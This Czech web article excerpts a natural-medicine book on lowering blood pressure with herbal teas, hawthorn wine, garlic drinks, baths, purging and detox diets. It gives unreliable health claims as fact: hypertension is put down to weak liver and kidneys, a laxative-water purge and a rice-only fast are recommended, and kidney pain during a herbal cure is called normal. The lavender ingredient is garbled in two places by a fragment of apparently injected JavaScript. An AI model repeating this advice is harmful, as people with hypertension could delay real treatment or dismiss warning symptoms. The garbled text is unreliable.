Knihovnička Meduňky,  Meduňka

Z meduňkové knihovničky: Když ženy rozkvetou…

Kolem nás všechno kvete, a tak je na čase, abychom rozkvetly i my, ženy. A kvést můžeme jen tehdy, když budeme zdravé a spokojené…Mnoho skvělých rad pro zdraví těla a ducha najdete v knize Simony Procházkové  Když ženy rozkvetou... s podtitulem Recepty pro zdraví a krásu. Z knihy jsme vybrali část kapitoly, která se věnuje velmi častému problému vysokého krevního tlaku. Přírodní medicína totiž nabízí některé účinné možnosti, jak tlak snižovat..
V knize najdete také mnoho doporučení a receptů, jak využít přírodní medicínu v různých obdobích ženského života – např. při přípravě na těhotenství a porod, dozvíte se třeba, jak pečovat o prsa, jak zabránit nevolnostem atd.
Knihu získáte na www.obchodmedunka.cz nebo www.knihovnickamedunky.cz

 

Krevní tlak je vlastně síla, kterou používá krev při cirkulaci v žilách a tepnách. Je řízena systémem, do něhož patří srdce, krevní cévy, nervy, mozek, ledviny a nadledvinky. Normální krevní tlak kolísá, ale u některých jedinců setrvává na vysokých hodnotách, což je stav nazývaný hypertenze – vysoký krevní tlak.

Jak se měří krevní tlak?
Krevní tlak je určován dvěma hodnotami – systolickou (tlak krve vstupující ze srdce do aorty) a diastolickou (tlak krve při uvolnění komor mezi dvěma srdečními stahy). V normě se uvádí krevní tlak kolem 120/80 mm rtuťového sloupce. Hypertenze je definovaná hodnotami v průměru vyššími než 140/90, zjištěnými nejméně při dvou oddělených měřeních.

Vysoký krevní tlak přetěžuje srdce a tepny…
Hypertenze je hlavním rizikovým faktorem při postižení mozkovou mrtvicí. Je rovněž jedním ze tři hlavních rizikových faktorů při vzniku srdečně cévních chorob, infarktu myokardu, často i ledvin.

 Vysoký krevní tlak můžeme s úspěchem snížit bylinkami, očistouAlternativní medicína udává za příčinu hypertenze oslabenou činnost jater a ledvin. Je tedy nutné dát tyto orgány zase „do formy“.

Čím bychom měli začít? Rychlou očistou!
Vymezíme si den, kdy nemusíme ven a můžeme si v klidu relaxovat.
Potřebujeme: 1 litr Zaječice hořké (koupíme ji v lékárně) * nebo1 litr Šaratice (pokud Zaječici neseženeme)
Postup: Ráno nalačno během 2 hodin vypijeme 1 litr kyselky a 0,5 litru vlažné vody a pak průběžně navštěvujeme toaletu až do doby, než máme úplně vyčištěná střeva. Tato očista netrvá více než 2,5 hodiny.
Odpoledne už můžeme začít jíst dušenou zeleninu, rýži a nesmíme zapomenout vypít 2 litry vlažné vody.

Cílené snížení krevního tlaku
Čajík na snížení krevního tlaku
Potřebujeme: 1 lžičku chmelových šišek * 1 lžíci meduňky * 1 lžíci květu a plodu hlohu * 1 lžíci srdečníku * 0,5 litru vroucí vody
Postup: Léčivky smícháme, zalijeme vroucí vodou a vše necháme 15 minut louhovat, poté přecedíme, nalijeme do termosky a popíjíme během dne. Tato pitná kúra by měla trvat 4 týdny.

Hlohovo-meduňkové víno
Potřebujeme: 1 šálek nasekaných hlohových květů * 1 lžíci meduňky * 1 l kvalitního červeného vína
Postup: Léčivky zalijeme vínem a vše necháme 14 dní na teplém místě louhovat. Nesmíme zapomenout 2× denně protřepávat. Po uplynutí této doby přecedíme, nalijeme do skleněné lahve a uschováme v chladnu a temnu. Užíváme 1× denně 1 štamprlku po dobu 8 týdnů.

Léčivý česnekový šejk
Česnek je snadno dostupný a spolehlivý lék na celkové posílení organismu i snížení krevního tlaku. Tato zelenina působí tak, že roztahuje cévy a snižuje tlak svalového stahu srdce a snižuje i frekvenci srdečního tepu. Nemusíme mít strach z nepříjemného zápachu, protože v kombinaci s citronem není vůbec cítit.
Potřebujeme: 30 oloupaných stroužků česneku * 5 nakrájených neoloupaných bio citronů
Postup: Přísady rozmixujeme a k vzniklé kaši přidáme 1 litr vody a vše přivedeme k varu. Pozor! Necháme ale jen jednou převařit! Pak scedíme a nalijeme do lahve. Nápoj uschováváme v ledničce.
Užívání: první týden 3× denně 1 lžičku, potom přejdeme na 3× týdně 1 štamprlku po dobu 4 týdnů, pak je vhodná 10denní pauza a můžeme zase na 3 týdny pokračovat s užíváním. Opakujeme 3× po sobě. Tuto proceduru provádíme 1× za 3 roky.

Uvolňující večerní koupel
Potřebujeme: 3 lžíce hlohových květů * 3 lžíci meduňky * 1 lžíci levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andule * 1 lžíci chmelových šišek * 1 lžíci květu lípy * 3 lžíci medu * 2 litry vroucí vody
Postup: Bylinky smícháme a přelijeme vroucí vodou, přidáme med a vše necháme 2 hodiny louhovat. Poté přecedíme a nalijeme do vody ve vaně (37–38  oC). Koupel by měla trvat 15 minut. Provádíme si ji tak půl hodiny až hodinu před plánovaným ulehnutím.

Rýžová detoxikace
Detoxikace organismu pomocí rýže je výbornou očistnou procedurou. Po dobu 3–7 dní konzumujeme v neomezeném množství pouze nesolenou rýži natural a k ní pijeme 2,5 litru vlažné vody, nic víc.

Hydroterapie snižuje krevní tlak
Střídavé studené a horké koupele nohou příznivě ovlivňují hypertenzi.
Jak na to?
Potřebujeme: 1 větší nádobu s horkou vodou * 1 větší nádobu se studenou vodou * ručník
Postup: Nejdříve dáme obě nohy na 2 minuty do nádoby s horkou vodou, pak je na 1 minutu vložíme do nádoby se studenou vodou. Tento postup opakujeme 3× po sobě. Provádíme denně po dobu 3 týdnů.

Pozor na stres!
Stresové situace, hněv, strach a úzkost zvyšují krevní tlak, a tím i nemoci srdce a cév.

Začněme relaxovat…
Cílené relaxace výrazně snižují krevní tlak, je to dáno tím, že se snižuje hladina stresových hormonů v těle. Užitečným pomocníkem nám může být relaxační CD.
Hudba má vliv na změnu mozkových vln. Toho můžeme využít při harmonizaci i samotné léčbě nejrůznějších potíží. Harmonizovat se dá jednoduchými, uklidňujícími zvuky, jako je například zpěv ptáků, delfínů, hučení mořských vln, praskání ohně atd., všechny tyto zvuky přispívají k relaxaci. Terapie zvukem je proto vhodná především k odstranění nervozity, nevyrovnanosti, stresu, úzkostných stavů a dalších emočních problémů.
Jak na to?
Zapálíme si aromalampu například s vůní levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andule, santalu či jalovce, pustíme si relaxační hudbu, lehneme si na záda, přikryjeme se a zaposloucháme do tónů. Relaxujeme 30 minut. Zvukovou relaxaci se doporučuje provádět alespoň 3× týdně, nejlépe však každý den…
 

Pravidelný pohyb je velmi prospěšný
Pro lidi s hypertenzí je důležitý pravidelný pohyb. Půlhodinová procházka svižnou chůzí by měla být na denním programu. Další vhodnou pohybovou aktivitou je plavání, jízda na kole, tanec a jóga.

Po cíleném snížení krevního tlaku je vhodné přejít na regeneraci ledvin
Zdravé ledviny jsou pro správný chod celého organismu naprosto nezbytné, protože udržují v rovnováze celý organismus. Nedostatečná činnost ledvin se projevuje hromaděním odpadových látek v krvi, které měly být odstraněny.

Nejlepší čaj na regeneraci ledvin – čaj Jiřího Janči
Abychom dokonale zregenerovali ledviny, je vhodné 8týdenní popíjení například speciálně namíchaného čaje podle Ing. Jiřího Janči (dá se pod tímto názvem koupit v nálevových sáčcích). Nesmí se ani 1 den vynechat. Čaj se popíjí 3× denně a musí být vždy čerstvý!
Potřebujeme: 3 hrsti natě celíku zlatobýlu (musí být použitý pouze tento druh celíku Solidago virgaurea) * 1 hrst natě přesličky rolní * 1 hrst natě truskavce ptačího * 1 hrst natě rdesna blešníku
Postup: Léčivky smícháme dohromady, čaj si připravíme tak, že 1 čajovou lžičku směsi přelijeme 2 dl vroucí vody a necháme 10 minut louhovat, pak přecedíme a popíjíme.
Ještě nesmím zapomenout zdůraznit, že ledviny mají tendenci „smršťovat se“ a právě tyto bylinky je začnou nutit se opět roztáhnout a výkonně pracovat. Proto během ledvinové kúry někteří lidé pociťují bolestivost v oblasti ledvin, ale je to v pořádku.